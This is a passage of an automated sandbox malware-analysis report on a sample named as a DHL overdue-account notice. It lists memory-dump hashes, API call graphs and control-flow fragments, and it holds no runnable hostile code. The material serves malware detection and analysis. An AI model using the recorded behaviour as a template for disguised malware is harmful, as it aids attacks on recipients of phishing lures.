                                                  • Opcode Fuzzy Hash: 58755a74492422951f1187b7c9fa901a50366b77a3e3aa6654778750ac158fbc
                                                  • Instruction Fuzzy Hash: 05C16AF17006268FEB2ADB75C450BEEB7EAAF89700F14446DD18A9B2D0CB35E901CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 62d09db7983e1a94a89e9c2cd78498665a3f4ee5c295bcb1a2924020eba0f63d
                                                  • Instruction ID: e23ac1d8a9fa522d43b4c490826751946b3c71de8a028504678204d950a98d8d
                                                  • Opcode Fuzzy Hash: 62d09db7983e1a94a89e9c2cd78498665a3f4ee5c295bcb1a2924020eba0f63d
                                                  • Instruction Fuzzy Hash: 2DE120B4E002698FDB14DF99C590AAEFBF6FF89304F248269D418A7355D731A942CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c36d961d0be0edfb893cb0a5c97e9de860caa2d19da0f4d5696b6ea347c07ffe
                                                  • Instruction ID: 76ef7c837704f1aad00435db86b9b7c4bc422ea3c54801a641a83d9477cdb4cb
                                                  • Opcode Fuzzy Hash: c36d961d0be0edfb893cb0a5c97e9de860caa2d19da0f4d5696b6ea347c07ffe
                                                  • Instruction Fuzzy Hash: AFE11BB4E002698FDB14DFA8C590AAEFBF6FF89304F248259D418A7355D731A942CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bacfa8d3f70f90db1fee128a9a453dafaa23fd7e51bcc72e48724694e3ad1ed
                                                  • Instruction ID: c68e55a15e02aebec2bb0672ed2d0505426406dfa1da85977e32e2c9051b3bf0
                                                  • Opcode Fuzzy Hash: 0bacfa8d3f70f90db1fee128a9a453dafaa23fd7e51bcc72e48724694e3ad1ed
                                                  • Instruction Fuzzy Hash: ABE12AB4E006698FDB14DF99C590AAEFBB6FF89300F248269D418A7355C731AD42CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 58ed7928540eba6ee8185492cc8ea176a87a4959fa9fce29bc8dcf27ba3903dd
                                                  • Instruction ID: 63a874ed8d2fcfffda79c938b74a33ab278b4788ff2e03df68d85ea9c41333f5
                                                  • Opcode Fuzzy Hash: 58ed7928540eba6ee8185492cc8ea176a87a4959fa9fce29bc8dcf27ba3903dd
                                                  • Instruction Fuzzy Hash: 28E11DB4E002698FDB14DFA9C590AAEFBF6FF89304F248259D418A7355D731A942CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5168eb32d7eaf32a47ed4aed6e9cd216231d01007b7e20154a17979376b23ccf
                                                  • Instruction ID: f67e1e551ab33b33d9d77ca25102d8faf1f49116018ad6bd830553a50ab1d9e7
                                                  • Opcode Fuzzy Hash: 5168eb32d7eaf32a47ed4aed6e9cd216231d01007b7e20154a17979376b23ccf
                                                  • Instruction Fuzzy Hash: E2E12DB4E002698FDB14DF99C990AAEFBF6FF89304F248259D418A7355D731A942CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368283913.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_78f0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7edafde29ba1c3010f918c9a4b61784eeca75b0493b1aed29fe3a50f34f7f9bf
                                                  • Instruction ID: 8d7d0fe050209ade75b90990cec245ac519e8bf8a9050107a82fda3d8e2debf9
                                                  • Opcode Fuzzy Hash: 7edafde29ba1c3010f918c9a4b61784eeca75b0493b1aed29fe3a50f34f7f9bf
                                                  • Instruction Fuzzy Hash: C4A18570B002569FDB58BBB8881477F76A7AFC4740F14853D9106EB399CE389C4397A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d44231d13fc6f3570a2818464e7a82de58cd6fa695cdd9d42d6b31df04d1af77
                                                  • Instruction ID: 24503d06f83c267f99b08b5e927b80b2e4e707fb97c41686c979952a94307391
                                                  • Opcode Fuzzy Hash: d44231d13fc6f3570a2818464e7a82de58cd6fa695cdd9d42d6b31df04d1af77
                                                  • Instruction Fuzzy Hash: 7DD1F431D20B5BCADB10EB64D990A9DB7B1FF95300F10C79AE50977261EBB06AC5CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85e557b37801a26745c0fabafb15eb40472533179a48fbc242a52f91fce067b3
                                                  • Instruction ID: 86b7a5d2b0981843324973628656ffb64d0e8fb62179af48e089b9fb0ffc5c74
                                                  • Opcode Fuzzy Hash: 85e557b37801a26745c0fabafb15eb40472533179a48fbc242a52f91fce067b3
                                                  • Instruction Fuzzy Hash: 4381E2B4E50219CFCB48CF99C58499EFBF6FF89210F14955AD419AB360D334AA42CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ec8cd7e483d63167c384b609e2ad3b5283db343a7c9c6fb03d6a1d72568322d
                                                  • Instruction ID: 533ebd1992ea096ffdd564644da192053af1d03bdc924bce779ac49e18d56de7
                                                  • Opcode Fuzzy Hash: 8ec8cd7e483d63167c384b609e2ad3b5283db343a7c9c6fb03d6a1d72568322d
                                                  • Instruction Fuzzy Hash: 99610E71900246CFDB48EF6AE98169ABFF3FBC4344F14C529D004AB259DBBA5916CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9104e05727860647cf706bb0965d2432fa7fdb5c995d79a51a32d61d0560de18
                                                  • Instruction ID: 1a7b11584f01a7c2c069430da88b7f6c1cd99df59ee56378b0e227a9867d90c4
                                                  • Opcode Fuzzy Hash: 9104e05727860647cf706bb0965d2432fa7fdb5c995d79a51a32d61d0560de18
                                                  • Instruction Fuzzy Hash: F36137F4A26A09DBEB08CFD1E086059BFF9FB89310F219595C08D93155DB7CA660CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca2703c65e9956eaf75b4b632072aec137b901cb7e276bf8c57a45206e342d97
                                                  • Instruction ID: c30d4913dce63e78061449f72d2fd883aca7d655f95619e17001d86f0421c87c
                                                  • Opcode Fuzzy Hash: ca2703c65e9956eaf75b4b632072aec137b901cb7e276bf8c57a45206e342d97
                                                  • Instruction Fuzzy Hash: C461FF71D00245CFDB48EF6AE981A9E7FF3FBC4304F14C529D004AB259DBBA59068B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f94e023b720cf4d2fc3e613824d53380155f97ba86cf143837fabea1e2d01b6
                                                  • Instruction ID: 9d04795596704255a856ef28a416d971ed71ec116dc5c28e656cd7a7699eeb31
                                                  • Opcode Fuzzy Hash: 2f94e023b720cf4d2fc3e613824d53380155f97ba86cf143837fabea1e2d01b6
                                                  • Instruction Fuzzy Hash: C1513AB1E2520ADBDB08CFAAD4855AEFBF2AF89210F10902AD515B7354D7385A418FA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e87ec7a160cf006974dd02295cb238236a9ea7624ac08cb2d96bd253d9004d5
                                                  • Instruction ID: 2ca1bc3b607a86a7a32bd779e9d0d9430a67690857394aadcb2d88c9a778ec51
                                                  • Opcode Fuzzy Hash: 0e87ec7a160cf006974dd02295cb238236a9ea7624ac08cb2d96bd253d9004d5
                                                  • Instruction Fuzzy Hash: B5513EB4E002698FDB14CFA9C9905AEFBF6FF89300F248269D458A7356D7319942CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c32e9364ea688daa5f16bcc55018fd3b74cc29e785d11bb1970a6897edc906f
                                                  • Instruction ID: d6c836898cc4a3bfd89fdbb30d59d5d462a5b451c15aecbf2e3900ae4d69ba19
                                                  • Opcode Fuzzy Hash: 2c32e9364ea688daa5f16bcc55018fd3b74cc29e785d11bb1970a6897edc906f
                                                  • Instruction Fuzzy Hash: 8C417FB1D057588FEB5DCF6B8C4028AFBF3AFC5210F19C1BAC458AA225EB3509568F11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f3bd2b645b7f9bc36ddcf856db6b773b3b7ecd2fccbcb1347fa7660badbe6c9f
                                                  • Instruction ID: 07ab6446476376f6afce95c03d69791529e2328d97cfc19070cc401f1508fcbc
                                                  • Opcode Fuzzy Hash: f3bd2b645b7f9bc36ddcf856db6b773b3b7ecd2fccbcb1347fa7660badbe6c9f
                                                  • Instruction Fuzzy Hash: 334171B1E016588BEB1CCF6B8C4079EFAF7AFC8301F18C1BA841CAA254EB3415858F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f369a8bd0165b2ec8efed1eabcef683dc951ac2646fe8281662caee1b6613897
                                                  • Instruction ID: 5831fb6cff66d7661bb30e99d692c211f0fb71db9d03b34aa2695c1308cbbfbf
                                                  • Opcode Fuzzy Hash: f369a8bd0165b2ec8efed1eabcef683dc951ac2646fe8281662caee1b6613897
                                                  • Instruction Fuzzy Hash: 9C41C6F1D1420ADBEB08CFAAC4815AEFBF6FF89300F24D56AC419A7214D774AA518F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$B$B
                                                  • API String ID: 0-685577651
                                                  • Opcode ID: a6cbecb084335e7d7c4b3a2ef3e6aebd3d81cc147d3b09602cf3a212d75246fd
                                                  • Instruction ID: 2792ad300d5dee99d4dcfe0ef81bf79f6123e53e18c5eee4f79ca8e26ec8d1c9
                                                  • Opcode Fuzzy Hash: a6cbecb084335e7d7c4b3a2ef3e6aebd3d81cc147d3b09602cf3a212d75246fd
                                                  • Instruction Fuzzy Hash: 7A51BFB67002168FC754DF68D88456EBBF2FF8922071482AAE419CB761DB30E812DB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:11.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:152
                                                  Total number of Limit Nodes:15
                                                  execution_graph 38662 1317350 38663 1317396 DeleteFileW 38662->38663 38665 13173cf 38663->38665 38676 6522c00 DuplicateHandle 38677 6522c96 38676->38677 38678 12bd01c 38679 12bd034 38678->38679 38680 12bd08e 38679->38680 38685 652d257 38679->38685 38689 652d268 38679->38689 38693 652e3b8 38679->38693 38702 652a264 38679->38702 38686 652d265 38685->38686 38687 652a264 CallWindowProcW 38686->38687 38688 652d2af 38687->38688 38688->38680 38690 652d28e 38689->38690 38691 652a264 CallWindowProcW 38690->38691 38692 652d2af 38691->38692 38692->38680 38694 652e3c8 38693->38694 38695 652e429 38694->38695 38697 652e419 38694->38697 38727 652a32c 38695->38727 38711 652e550 38697->38711 38716 652e61c 38697->38716 38722 652e540 38697->38722 38698 652e427 38703 652a26f 38702->38703 38704 652e429 38703->38704 38706 652e419 38703->38706 38705 652a32c CallWindowProcW 38704->38705 38707 652e427 38705->38707 38708 652e550 CallWindowProcW 38706->38708 38709 652e540 CallWindowProcW 38706->38709 38710 652e61c CallWindowProcW 38706->38710 38708->38707 38709->38707 38710->38707 38713 652e564 38711->38713 38712 652e5f0 38712->38698 38731 652e608 38713->38731 38734 652e5f8 38713->38734 38717 652e5da 38716->38717 38718 652e632 38717->38718 38720 652e608 CallWindowProcW 38717->38720 38721 652e5f8 CallWindowProcW 38717->38721 38719 652e5f0 38719->38698 38720->38719 38721->38719 38724 652e54e 38722->38724 38723 652e5f0 38723->38698 38725 652e608 CallWindowProcW 38724->38725 38726 652e5f8 CallWindowProcW 38724->38726 38725->38723 38726->38723 38728 652a337 38727->38728 38729 652f88a CallWindowProcW 38728->38729 38730 652f839 38728->38730 38729->38730 38730->38698 38732 652e619 38731->38732 38738 652f7c0 38731->38738 38732->38712 38735 652e608 38734->38735 38736 652e619 38735->38736 38737 652f7c0 CallWindowProcW 38735->38737 38736->38712 38737->38736 38739 652a32c CallWindowProcW 38738->38739 38740 652f7da 38739->38740 38740->38732 38741 1310848 38743 131084e 38741->38743 38742 131091b 38743->38742 38747 65218b0 38743->38747 38751 65218a0 38743->38751 38755 1311390 38743->38755 38748 65218bf 38747->38748 38759 6521288 38748->38759 38752 65218bf 38751->38752 38753 6521288 3 API calls 38752->38753 38754 65218e0 38753->38754 38754->38743 38756 13113a6 38755->38756 38757 13114b8 38756->38757 38835 1317528 38756->38835 38757->38743 38760 6521293 38759->38760 38763 6522724 38760->38763 38762 6523266 38764 652272f 38763->38764 38765 652398c 38764->38765 38767 6525208 38764->38767 38765->38762 38768 6525229 38767->38768 38769 652524d 38768->38769 38771 65253b8 38768->38771 38769->38765 38772 65253c5 38771->38772 38773 65253fe 38772->38773 38775 652372c 38772->38775 38773->38769 38776 6523737 38775->38776 38778 6525870 38776->38778 38779 6525410 38776->38779 38778->38778 38780 652541b 38779->38780 38786 6525420 38780->38786 38782 65258df 38790 652ac00 38782->38790 38799 652abe8 38782->38799 38783 6525919 38783->38778 38789 652542b 38786->38789 38787 6526b68 38787->38782 38788 6525208 3 API calls 38788->38787 38789->38787 38789->38788 38792 652ac31 38790->38792 38794 652ad31 38790->38794 38791 652ac3d 38791->38783 38792->38791 38807 652ae76 38792->38807 38811 652ae78 38792->38811 38793 652ac7d 38814 652c178 38793->38814 38818 652c169 38793->38818 38794->38783 38800 652ac00 38799->38800 38802 652ac3d 38800->38802 38803 652ae76 2 API calls 38800->38803 38804 652ae78 2 API calls 38800->38804 38801 652ac7d 38805 652c178 CreateWindowExW 38801->38805 38806 652c169 CreateWindowExW 38801->38806 38802->38783 38803->38801 38804->38801 38805->38802 38806->38802 38808 652ae78 38807->38808 38822 652aeb8 38808->38822 38809 652ae82 38809->38793 38813 652aeb8 2 API calls 38811->38813 38812 652ae82 38812->38793 38813->38812 38815 652c1a3 38814->38815 38816 652c252 38815->38816 38830 652d065 38815->38830 38819 652c178 38818->38819 38820 652c252 38819->38820 38821 652d065 CreateWindowExW 38819->38821 38821->38820 38823 652aebd 38822->38823 38824 652aefc 38823->38824 38828 652b160 LoadLibraryExW 38823->38828 38829 652b15d LoadLibraryExW 38823->38829 38824->38809 38825 652b100 GetModuleHandleW 38827 652b12d 38825->38827 38826 652aef4 38826->38824 38826->38825 38827->38809 38828->38826 38829->38826 38831 652d069 38830->38831 38832 652d09d CreateWindowExW 38830->38832 38831->38816 38834 652d1d4 38832->38834 38836 1317532 38835->38836 38837 131754c 38836->38837 38840 653d818 38836->38840 38845 653d828 38836->38845 38837->38756 38842 653d822 38840->38842 38841 653da52 38841->38837 38842->38841 38843 653da78 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38842->38843 38844 653da68 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38842->38844 38843->38842 38844->38842 38847 653d83d 38845->38847 38846 653da52 38846->38837 38847->38846 38848 653da68 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38847->38848 38849 653da78 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38847->38849 38848->38847 38849->38847 38666 65229b8 38667 65229fe GetCurrentProcess 38666->38667 38669 6522a50 GetCurrentThread 38667->38669 38670 6522a49 38667->38670 38671 6522a86 38669->38671 38672 6522a8d GetCurrentProcess 38669->38672 38670->38669 38671->38672 38675 6522ac3 38672->38675 38673 6522aeb GetCurrentThreadId 38674 6522b1c 38673->38674 38675->38673

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 06522A36
                                                  • GetCurrentThread.KERNEL32 ref: 06522A73
                                                  • GetCurrentProcess.KERNEL32 ref: 06522AB0
                                                  • GetCurrentThreadId.KERNEL32 ref: 06522B09
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 02e497e9bd3c66f3b6fbca466fed79b8af3685a5418cff6c702eac07a4773740
                                                  • Instruction ID: 0f69bcc8a2bf509108bac67db2bc249c2a66788d6d21575c14c8efd8de4c06db
                                                  • Opcode Fuzzy Hash: 02e497e9bd3c66f3b6fbca466fed79b8af3685a5418cff6c702eac07a4773740
                                                  • Instruction Fuzzy Hash: 6F5155B090034A8FEB54CFA9D948BEEBBF1FF88314F248059E119A7290DB749944CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 06522A36
                                                  • GetCurrentThread.KERNEL32 ref: 06522A73
                                                  • GetCurrentProcess.KERNEL32 ref: 06522AB0
                                                  • GetCurrentThreadId.KERNEL32 ref: 06522B09
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 3b35a02b43e38e2e258e221f2c14800b475a99a2296d5a8f6bc1884d2d849b71
                                                  • Instruction ID: 0ba5ddac01a187189e85e8182d7226793be0f6c7b98f9b5b62e6fce64b9dba64
                                                  • Opcode Fuzzy Hash: 3b35a02b43e38e2e258e221f2c14800b475a99a2296d5a8f6bc1884d2d849b71
                                                  • Instruction Fuzzy Hash: BB5155B090034A8FEB54CFA9D948BAEBBF1FF88314F248059E119A7290DB749944CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1111 652aeb8-652aed7 1113 652af03-652af07 1111->1113 1114 652aed9-652aee6 call 652a080 1111->1114 1115 652af1b-652af5c 1113->1115 1116 652af09-652af13 1113->1116 1121 652aee8 1114->1121 1122 652aefc 1114->1122 1123 652af69-652af77 1115->1123 1124 652af5e-652af66 1115->1124 1116->1115 1168 652aeee call 652b160 1121->1168 1169 652aeee call 652b15d 1121->1169 1122->1113 1126 652af9b-652af9d 1123->1126 1127 652af79-652af7e 1123->1127 1124->1123 1125 652aef4-652aef6 1125->1122 1128 652b038-652b0f8 1125->1128 1129 652afa0-652afa7 1126->1129 1130 652af80-652af87 call 652a08c 1127->1130 1131 652af89 1127->1131 1163 652b100-652b12b GetModuleHandleW 1128->1163 1164 652b0fa-652b0fd 1128->1164 1133 652afb4-652afbb 1129->1133 1134 652afa9-652afb1 1129->1134 1132 652af8b-652af99 1130->1132 1131->1132 1132->1129 1136 652afc8-652afd1 call 652348c 1133->1136 1137 652afbd-652afc5 1133->1137 1134->1133 1143 652afd3-652afdb 1136->1143 1144 652afde-652afe3 1136->1144 1137->1136 1143->1144 1145 652b001-652b00e 1144->1145 1146 652afe5-652afec 1144->1146 1152 652b010-652b02e 1145->1152 1153 652b031-652b037 1145->1153 1146->1145 1148 652afee-652affe call 65286e8 call 652a09c 1146->1148 1148->1145 1152->1153 1165 652b134-652b148 1163->1165 1166 652b12d-652b133 1163->1166 1164->1163 1166->1165 1168->1125 1169->1125
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0652B11E
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 5bf75b018aca98f4da5abe391c5794f7662bf9fc62cb0395f09f4e495ca4c81d
                                                  • Instruction ID: 220faa36721077d0f4bd6eb57e2544d551b171e4d12a7bbffa2ca07446f76861
                                                  • Opcode Fuzzy Hash: 5bf75b018aca98f4da5abe391c5794f7662bf9fc62cb0395f09f4e495ca4c81d
                                                  • Instruction Fuzzy Hash: 2B8123B0A00B168FD7A4DF69D44479ABBF1FF89204F008A2DE496D7A80DB75E845CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1170 652d065-652d067 1171 652d069-652d090 call 652a23c 1170->1171 1172 652d09d-652d116 1170->1172 1177 652d095-652d096 1171->1177 1175 652d121-652d128 1172->1175 1176 652d118-652d11e 1172->1176 1178 652d133-652d1d2 CreateWindowExW 1175->1178 1179 652d12a-652d130 1175->1179 1176->1175 1181 652d1d4-652d1da 1178->1181 1182 652d1db-652d213 1178->1182 1179->1178 1181->1182 1186 652d220 1182->1186 1187 652d215-652d218 1182->1187 1188 652d221 1186->1188 1187->1186 1188->1188
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0652D1C2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 405cba95b34af183380284f14ead96a455cfe469b07b012613e7a05468caa93e
                                                  • Instruction ID: fc2c027ae24d2641cd4f21f3ceca6dbc5c8a1b8e5d20e7875bc4e81c6f24d3ed
                                                  • Opcode Fuzzy Hash: 405cba95b34af183380284f14ead96a455cfe469b07b012613e7a05468caa93e
                                                  • Instruction Fuzzy Hash: 5E51F3B1C00259EFDF15CF99C884ADEBFB5BF49310F14816AE918AB260D7719855CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1189 653e640-653e64b 1190 653e675-653e694 call 653d7f4 1189->1190 1191 653e64d-653e674 call 653d7e8 1189->1191 1197 653e696-653e699 1190->1197 1198 653e69a-653e6f9 1190->1198 1205 653e6fb-653e6fe 1198->1205 1206 653e6ff-653e78c GlobalMemoryStatusEx 1198->1206 1210 653e795-653e7bd 1206->1210 1211 653e78e-653e794 1206->1211 1211->1210
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421323475.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6530000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb12571f44bba02b7d1aaff92e5089bca52e65348185cd7b0bc2308b0398a123
                                                  • Instruction ID: b96c265f7bb90a2355fe91a27a9a937182d44ab25689e0bf2635d3f34ff83da5
